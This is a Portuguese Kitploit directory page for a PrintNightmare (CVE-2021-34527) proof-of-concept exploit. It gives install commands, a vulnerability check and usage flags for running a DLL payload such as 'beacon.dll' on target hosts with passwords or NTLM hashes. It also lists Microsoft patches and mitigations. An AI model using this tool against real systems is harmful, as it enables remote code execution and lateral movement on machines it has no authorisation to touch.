Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2021-34527 — Exploit PoC do PrintNightmare (CVE-2021-34527) | Kitploit
Ferramentas/GitHubGitHub/m8sec/cve-2021-34527
Escalada de PrivilégiosGeração de PayloadsAnálise de VulnerabilidadesExploraçãoMovimento LateralTestes de Penetração
GitHubm8sec/cve-2021-34527

CVE-2021-34527

Exploit PoC do PrintNightmare (CVE-2021-34527)

Ver Repositório
11819há 3 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

PrintNightmare (CVE-2021-34527)

Esta versão do exploit PrintNightmare é baseada no código criado por Cube0x0, com os seguintes recursos:

  • Capacidade de atingir vários hosts.
  • Servidor SMB integrado para entrega de payload, eliminando a necessidade de compartilhamentos de arquivos abertos.
  • O exploit inclui os protocolos MS-RPRN e MS-PAR (definidos nos argumentos do CMD).
  • Implementa a técnica de bypass de UNC do @gentilkiwi.

Instalação

Antes de executar, instale a versão mais recente do impacket:

root@kitploit:~
git clone https://github.com/SecureAuthCorp/impacket
cd impacket
python3 setup install

git clone https://github.com/m8sec/CVE-2021-34527
cd CVE-2021-34527
python3 CVE-2021-34527.py -h

Teste

O rpcdump.py do Impacket pode ser usado para verificar os protocolos MS-PAR e MS-RPRN:

root@kitploit:~
>> rpcdump.py @192.168.1.10 | egrep 'MS-RPRN|MS-PAR'
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol 
Protocol: [MS-RPRN]: Print System Remote Protocol

Alternativamente, pode-se usar o scanner ItWasAllADream de byt3bl33d3r para escanear alvos e validar a vulnerabilidade RCE do PrintNightmare.

Capturas de tela

pnm

Uso

root@kitploit:~
  -v VERBOSE            Enable verbose logging from SMB server
  -t TIMEOUT            Connection timeout

Authentication:
  -u USERNAME           Set username
  -H HASH, -hashes      Use NTLM Hash for authentication
  -p PASSWORD           Set password
  -d DOMAIN             Set domain
  --local-auth          Authenticate to target host, no domain

DLL Execution:
  -dll DLL                  Path to local DLL file to execute "beacon.dll"
  --remote-dll REMOTE_DLL   Remote dll "\\192.168.1.25\Share\beacon.dll"
  -share SHARE              Set local SMB share name
  --local-ip LOCAL_IP       Set local IP (defaults to primary interface)

Target(s):
  -pDriverPath PDRIVERPATH  Define Driver path. Example 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL'
  -port [destination port]  Destination port to connect to SMB Server
  -proto {MS-RPRN,MS-PAR}   Target protocol (Default=MS-RPRN)
  target                    192.168.2.2, target.txt, 10.0.0.0/24 (positional)

Remediação

A Microsoft lançou vários patches para o PrintNightmare, o mais recente na Patch Tuesday de setembro de 2021. Isso corrigiu a vulnerabilidade subjacente e as soluções alternativas descobertas posteriormente. Para mais informações, visite a orientação oficial da Microsoft:

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527

Estratégias adicionais para mitigar esta vulnerabilidade incluem:

  • Desativar o serviço Print Spooler em sistemas não essenciais.
  • Desativar a impressão remota de entrada através da Diretiva de Grupo (Group Policy).

Agradecimentos

  • @cube0x0 - pelo código Python do exploit e suas contribuições ao projeto impacket.
  • @edwardzpeng e @lxf02942370 - pela descoberta inicial e exploração do PrintNightmare.
Baixar ferramenta